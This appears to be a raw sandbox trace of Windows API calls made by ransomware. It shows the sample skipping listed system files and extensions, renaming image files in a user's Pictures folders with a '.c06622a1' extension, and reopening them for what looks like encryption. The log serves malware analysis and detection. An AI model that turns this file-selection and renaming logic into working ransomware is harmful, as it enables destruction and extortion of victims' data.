_wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0156.024] wcslen (_String="ics") returned 0x3 [0156.024] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0156.024] wcslen (_String="idx") returned 0x3 [0156.024] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0156.024] wcslen (_String="ldf") returned 0x3 [0156.024] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0156.024] wcslen (_String="lnk") returned 0x3 [0156.024] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0156.024] wcslen (_String="mod") returned 0x3 [0156.024] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0156.024] wcslen (_String="mpa") returned 0x3 [0156.024] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0156.025] wcslen (_String="msc") returned 0x3 [0156.025] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0156.025] wcslen (_String="msp") returned 0x3 [0156.025] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0156.025] wcslen (_String="msstyles") returned 0x8 [0156.025] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0156.025] wcslen (_String="msu") returned 0x3 [0156.025] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0156.025] wcslen (_String="nls") returned 0x3 [0156.025] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0156.025] wcslen (_String="nomedia") returned 0x7 [0156.025] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0156.025] wcslen (_String="ocx") returned 0x3 [0156.025] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0156.025] wcslen (_String="prf") returned 0x3 [0156.025] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0156.025] wcslen (_String="ps1") returned 0x3 [0156.025] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0156.025] wcslen (_String="rom") returned 0x3 [0156.025] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0156.025] wcslen (_String="rtp") returned 0x3 [0156.025] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0156.025] wcslen (_String="scr") returned 0x3 [0156.026] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0156.026] wcslen (_String="shs") returned 0x3 [0156.026] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0156.026] wcslen (_String="spl") returned 0x3 [0156.026] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0156.026] wcslen (_String="sys") returned 0x3 [0156.026] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0156.026] wcslen (_String="theme") returned 0x5 [0156.026] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0156.026] wcslen (_String="themepack") returned 0x9 [0156.026] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0156.026] wcslen (_String="wpx") returned 0x3 [0156.026] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0156.026] wcslen (_String="lock") returned 0x4 [0156.026] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0156.026] wcslen (_String="key") returned 0x3 [0156.026] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0156.026] wcslen (_String="hta") returned 0x3 [0156.026] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0156.026] wcslen (_String="msi") returned 0x3 [0156.026] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0156.026] wcslen (_String="pdb") returned 0x3 [0156.027] _wcsicmp (_Str1="sql", _Str2="bmp") returned 17 [0156.027] wcslen (_String="sql") returned 0x3 [0156.027] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0156.027] wcslen (_String="sqlite") returned 0x6 [0156.027] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm")) returned 0x10 [0156.027] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0156.027] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" [0156.027] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM") returned 0x4a [0156.027] wcscpy (in: _Dest=0x4560156, _Source="Utng.bmp" | out: _Dest="Utng.bmp") returned="Utng.bmp" [0156.027] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\Utng.bmp", dwFileAttributes=0x80) returned 1 [0156.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\Utng.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\utng.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0156.037] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.037] ReadFile (in: hFile=0x63c, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0156.038] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0xe2ac2efc [0156.038] RtlComputeCrc32 (PartialCrc=0x2efc, Buffer=0x3fe3f4, Length=0x80) returned 0x678a76ba [0156.038] RtlComputeCrc32 (PartialCrc=0x76ba, Buffer=0x3fe3f4, Length=0x80) returned 0x600cfe21 [0156.038] RtlComputeCrc32 (PartialCrc=0xfe21, Buffer=0x3fe3f4, Length=0x80) returned 0x8257a1de [0156.038] RtlComputeCrc32 (PartialCrc=0xa1de, Buffer=0x3fe3f4, Length=0x80) returned 0x7f1a3d5c [0156.038] CloseHandle (hObject=0x63c) returned 1 [0156.039] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0156.039] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\Utng.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\Utng.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\Utng.bmp" [0156.039] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\Utng.bmp") returned 0x53 [0156.039] wcscpy (in: _Dest=0x457016e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.039] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\Utng.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\utng.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\Utng.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\utng.bmp.c06622a1"), dwFlags=0x8) returned 1 [0156.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\Utng.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\utng.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x65c [0156.048] CreateIoCompletionPort (FileHandle=0x65c, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0156.048] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4ee0020 [0156.056] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x76f216a2 [0156.056] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1e281847 [0156.056] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4a914f2 [0156.056] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3525f568 [0156.056] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3f8009eb [0156.056] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x550f8c7f [0156.056] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x10e66258 [0156.056] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7f909622 [0156.059] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4ee0094, Length=0x80) returned 0x4436c541 [0156.059] RtlComputeCrc32 (PartialCrc=0xc541, Buffer=0x4ee0094, Length=0x80) returned 0xb7c2fab4 [0156.059] RtlComputeCrc32 (PartialCrc=0xfab4, Buffer=0x4ee0094, Length=0x80) returned 0x413a56fd [0156.059] RtlComputeCrc32 (PartialCrc=0x56fd, Buffer=0x4ee0094, Length=0x80) returned 0xaeaf06c2 [0156.059] RtlComputeCrc32 (PartialCrc=0x6c2, Buffer=0x4ee0094, Length=0x80) returned 0x8e97bd2d [0156.059] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4ee0020) returned 1 [0156.059] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0156.059] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0156.060] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf013e7d0, ftCreationTime.dwHighDateTime=0x1d5dba9, ftLastAccessTime.dwLowDateTime=0xd0ff2bd0, ftLastAccessTime.dwHighDateTime=0x1d5ddc4, ftLastWriteTime.dwLowDateTime=0xd0ff2bd0, ftLastWriteTime.dwHighDateTime=0x1d5ddc4, nFileSizeHigh=0x0, nFileSizeLow=0x11af6, dwReserved0=0x0, dwReserved1=0x0, cFileName="UYLd.gif", cAlternateFileName="")) returned 1 [0156.060] _wcsicmp (_Str1="UYLd.gif", _Str2="README.c06622a1.TXT") returned 3 [0156.060] wcsstr (_Str="UYLd.gif", _SubStr="README") returned 0x0 [0156.060] _wcsicmp (_Str1="autorun.inf", _Str2="UYLd.gif") returned -20 [0156.060] wcslen (_String="autorun.inf") returned 0xb [0156.060] _wcsicmp (_Str1="boot.ini", _Str2="UYLd.gif") returned -19 [0156.060] wcslen (_String="boot.ini") returned 0x8 [0156.060] _wcsicmp (_Str1="bootfont.bin", _Str2="UYLd.gif") returned -19 [0156.060] wcslen (_String="bootfont.bin") returned 0xc [0156.060] _wcsicmp (_Str1="bootsect.bak", _Str2="UYLd.gif") returned -19 [0156.060] wcslen (_String="bootsect.bak") returned 0xc [0156.060] _wcsicmp (_Str1="desktop.ini", _Str2="UYLd.gif") returned -17 [0156.060] wcslen (_String="desktop.ini") returned 0xb [0156.060] _wcsicmp (_Str1="iconcache.db", _Str2="UYLd.gif") returned -12 [0156.060] wcslen (_String="iconcache.db") returned 0xc [0156.060] _wcsicmp (_Str1="ntldr", _Str2="UYLd.gif") returned -7 [0156.060] wcslen (_String="ntldr") returned 0x5 [0156.060] _wcsicmp (_Str1="ntuser.dat", _Str2="UYLd.gif") returned -7 [0156.060] wcslen (_String="ntuser.dat") returned 0xa [0156.060] _wcsicmp (_Str1="ntuser.dat.log", _Str2="UYLd.gif") returned -7 [0156.060] wcslen (_String="ntuser.dat.log") returned 0xe [0156.060] _wcsicmp (_Str1="ntuser.ini", _Str2="UYLd.gif") returned -7 [0156.061] wcslen (_String="ntuser.ini") returned 0xa [0156.061] _wcsicmp (_Str1="thumbs.db", _Str2="UYLd.gif") returned -1 [0156.061] wcslen (_String="thumbs.db") returned 0x9 [0156.061] _wcsicmp (_Str1="386", _Str2="gif") returned -52 [0156.061] wcslen (_String="386") returned 0x3 [0156.061] _wcsicmp (_Str1="adv", _Str2="gif") returned -6 [0156.061] wcslen (_String="adv") returned 0x3 [0156.061] _wcsicmp (_Str1="ani", _Str2="gif") returned -6 [0156.061] wcslen (_String="ani") returned 0x3 [0156.061] _wcsicmp (_Str1="bat", _Str2="gif") returned -5 [0156.061] wcslen (_String="bat") returned 0x3 [0156.061] _wcsicmp (_Str1="bin", _Str2="gif") returned -5 [0156.061] wcslen (_String="bin") returned 0x3 [0156.062] _wcsicmp (_Str1="cab", _Str2="gif") returned -4 [0156.062] wcslen (_String="cab") returned 0x3 [0156.062] _wcsicmp (_Str1="cmd", _Str2="gif") returned -4 [0156.062] wcslen (_String="cmd") returned 0x3 [0156.062] _wcsicmp (_Str1="com", _Str2="gif") returned -4 [0156.062] wcslen (_String="com") returned 0x3 [0156.062] _wcsicmp (_Str1="cpl", _Str2="gif") returned -4 [0156.062] wcslen (_String="cpl") returned 0x3 [0156.062] _wcsicmp (_Str1="cur", _Str2="gif") returned -4 [0156.062] wcslen (_String="cur") returned 0x3 [0156.062] _wcsicmp (_Str1="deskthemepack", _Str2="gif") returned -3 [0156.062] wcslen (_String="deskthemepack") returned 0xd [0156.062] _wcsicmp (_Str1="diagcab", _Str2="gif") returned -3 [0156.062] wcslen (_String="diagcab") returned 0x7 [0156.062] _wcsicmp (_Str1="diagcfg", _Str2="gif") returned -3 [0156.062] wcslen (_String="diagcfg") returned 0x7 [0156.062] _wcsicmp (_Str1="diagpkg", _Str2="gif") returned -3 [0156.062] wcslen (_String="diagpkg") returned 0x7 [0156.062] _wcsicmp (_Str1="dll", _Str2="gif") returned -3 [0156.062] wcslen (_String="dll") returned 0x3 [0156.062] _wcsicmp (_Str1="drv", _Str2="gif") returned -3 [0156.062] wcslen (_String="drv") returned 0x3 [0156.062] _wcsicmp (_Str1="exe", _Str2="gif") returned -2 [0156.063] wcslen (_String="exe") returned 0x3 [0156.063] _wcsicmp (_Str1="hlp", _Str2="gif") returned 1 [0156.063] wcslen (_String="hlp") returned 0x3 [0156.063] _wcsicmp (_Str1="icl", _Str2="gif") returned 2 [0156.063] wcslen (_String="icl") returned 0x3 [0156.063] _wcsicmp (_Str1="icns", _Str2="gif") returned 2 [0156.063] wcslen (_String="icns") returned 0x4 [0156.063] _wcsicmp (_Str1="ico", _Str2="gif") returned 2 [0156.063] wcslen (_String="ico") returned 0x3 [0156.063] _wcsicmp (_Str1="ics", _Str2="gif") returned 2 [0156.063] wcslen (_String="ics") returned 0x3 [0156.063] _wcsicmp (_Str1="idx", _Str2="gif") returned 2 [0156.063] wcslen (_String="idx") returned 0x3 [0156.063] _wcsicmp (_Str1="ldf", _Str2="gif") returned 5 [0156.063] wcslen (_String="ldf") returned 0x3 [0156.063] _wcsicmp (_Str1="lnk", _Str2="gif") returned 5 [0156.063] wcslen (_String="lnk") returned 0x3 [0156.063] _wcsicmp (_Str1="mod", _Str2="gif") returned 6 [0156.063] wcslen (_String="mod") returned 0x3 [0156.063] _wcsicmp (_Str1="mpa", _Str2="gif") returned 6 [0156.063] wcslen (_String="mpa") returned 0x3 [0156.063] _wcsicmp (_Str1="msc", _Str2="gif") returned 6 [0156.063] wcslen (_String="msc") returned 0x3 [0156.064] _wcsicmp (_Str1="msp", _Str2="gif") returned 6 [0156.064] wcslen (_String="msp") returned 0x3 [0156.064] _wcsicmp (_Str1="msstyles", _Str2="gif") returned 6 [0156.064] wcslen (_String="msstyles") returned 0x8 [0156.064] _wcsicmp (_Str1="msu", _Str2="gif") returned 6 [0156.064] wcslen (_String="msu") returned 0x3 [0156.064] _wcsicmp (_Str1="nls", _Str2="gif") returned 7 [0156.064] wcslen (_String="nls") returned 0x3 [0156.064] _wcsicmp (_Str1="nomedia", _Str2="gif") returned 7 [0156.064] wcslen (_String="nomedia") returned 0x7 [0156.064] _wcsicmp (_Str1="ocx", _Str2="gif") returned 8 [0156.064] wcslen (_String="ocx") returned 0x3 [0156.064] _wcsicmp (_Str1="prf", _Str2="gif") returned 9 [0156.064] wcslen (_String="prf") returned 0x3 [0156.064] _wcsicmp (_Str1="ps1", _Str2="gif") returned 9 [0156.064] wcslen (_String="ps1") returned 0x3 [0156.064] _wcsicmp (_Str1="rom", _Str2="gif") returned 11 [0156.064] wcslen (_String="rom") returned 0x3 [0156.064] _wcsicmp (_Str1="rtp", _Str2="gif") returned 11 [0156.064] wcslen (_String="rtp") returned 0x3 [0156.064] _wcsicmp (_Str1="scr", _Str2="gif") returned 12 [0156.064] wcslen (_String="scr") returned 0x3 [0156.065] _wcsicmp (_Str1="shs", _Str2="gif") returned 12 [0156.065] wcslen (_String="shs") returned 0x3 [0156.065] _wcsicmp (_Str1="spl", _Str2="gif") returned 12 [0156.065] wcslen (_String="spl") returned 0x3 [0156.065] _wcsicmp (_Str1="sys", _Str2="gif") returned 12 [0156.065] wcslen (_String="sys") returned 0x3 [0156.065] _wcsicmp (_Str1="theme", _Str2="gif") returned 13 [0156.065] wcslen (_String="theme") returned 0x5 [0156.065] _wcsicmp (_Str1="themepack", _Str2="gif") returned 13 [0156.065] wcslen (_String="themepack") returned 0x9 [0156.065] _wcsicmp (_Str1="wpx", _Str2="gif") returned 16 [0156.065] wcslen (_String="wpx") returned 0x3 [0156.065] _wcsicmp (_Str1="lock", _Str2="gif") returned 5 [0156.065] wcslen (_String="lock") returned 0x4 [0156.065] _wcsicmp (_Str1="key", _Str2="gif") returned 4 [0156.065] wcslen (_String="key") returned 0x3 [0156.065] _wcsicmp (_Str1="hta", _Str2="gif") returned 1 [0156.065] wcslen (_String="hta") returned 0x3 [0156.065] _wcsicmp (_Str1="msi", _Str2="gif") returned 6 [0156.065] wcslen (_String="msi") returned 0x3 [0156.065] _wcsicmp (_Str1="pdb", _Str2="gif") returned 9 [0156.065] wcslen (_String="pdb") returned 0x3 [0156.065] _wcsicmp (_Str1="sql", _Str2="gif") returned 12 [0156.066] wcslen (_String="sql") returned 0x3 [0156.066] _wcsicmp (_Str1="sqlite", _Str2="gif") returned 12 [0156.066] wcslen (_String="sqlite") returned 0x6 [0156.066] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm")) returned 0x10 [0156.066] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0156.066] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" [0156.066] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM") returned 0x4a [0156.066] wcscpy (in: _Dest=0x4560156, _Source="UYLd.gif" | out: _Dest="UYLd.gif") returned="UYLd.gif" [0156.066] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\UYLd.gif", dwFileAttributes=0x80) returned 1 [0156.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\UYLd.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\uyld.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x66c [0156.084] SetFilePointerEx (in: hFile=0x66c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.084] ReadFile (in: hFile=0x66c, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0156.084] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0xa46d4fda [0156.084] RtlComputeCrc32 (PartialCrc=0x4fda, Buffer=0x3fe3f4, Length=0x80) returned 0x32c2dc5 [0156.085] RtlComputeCrc32 (PartialCrc=0x2dc5, Buffer=0x3fe3f4, Length=0x80) returned 0x81b5f87b [0156.085] RtlComputeCrc32 (PartialCrc=0xf87b, Buffer=0x3fe3f4, Length=0x80) returned 0x818be5e6 [0156.085] RtlComputeCrc32 (PartialCrc=0xe5e6, Buffer=0x3fe3f4, Length=0x80) returned 0x3b874cd3 [0156.085] CloseHandle (hObject=0x66c) returned 1 [0156.085] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0156.085] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\UYLd.gif" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\UYLd.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\UYLd.gif" [0156.085] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\UYLd.gif") returned 0x53 [0156.085] wcscpy (in: _Dest=0x457016e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.085] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\UYLd.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\uyld.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\UYLd.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\uyld.gif.c06622a1"), dwFlags=0x8) returned 1 [0156.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\UYLd.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\uyld.gif.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x620 [0156.099] CreateIoCompletionPort (FileHandle=0x620, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0156.099] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2880020 [0156.106] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x40656c69 [0156.106] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x573d2d91 [0156.106] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x173a9980 [0156.107] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x71ea1833 [0156.107] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x71333970 [0156.107] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x369bc666 [0156.107] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1ee11de9 [0156.107] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x8ff4d35 [0156.110] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2880094, Length=0x80) returned 0xc7e525c0 [0156.110] RtlComputeCrc32 (PartialCrc=0x25c0, Buffer=0x2880094, Length=0x80) returned 0x85a2d8e [0156.110] RtlComputeCrc32 (PartialCrc=0x2d8e, Buffer=0x2880094, Length=0x80) returned 0x6f0d9d24 [0156.110] RtlComputeCrc32 (PartialCrc=0x9d24, Buffer=0x2880094, Length=0x80) returned 0xf19b343e [0156.110] RtlComputeCrc32 (PartialCrc=0x343e, Buffer=0x2880094, Length=0x80) returned 0xfd18b885 [0156.110] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2880020) returned 1 [0156.110] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0156.110] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0156.110] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.110] FindClose (in: hFindFile=0x2db8800 | out: hFindFile=0x2db8800) returned 1 [0156.119] _wcsicmp (_Str1="backup", _Str2="Z9eYlXFnqtFPpM") returned -24 [0156.119] wcslen (_String="backup") returned 0x6 [0156.119] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0156.119] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0156.119] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.119] FindClose (in: hFindFile=0x2db87c0 | out: hFindFile=0x2db87c0) returned 1 [0156.120] _wcsicmp (_Str1="backup", _Str2="ZLQWp8VVzu") returned -24 [0156.120] wcslen (_String="backup") returned 0x6 [0156.120] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 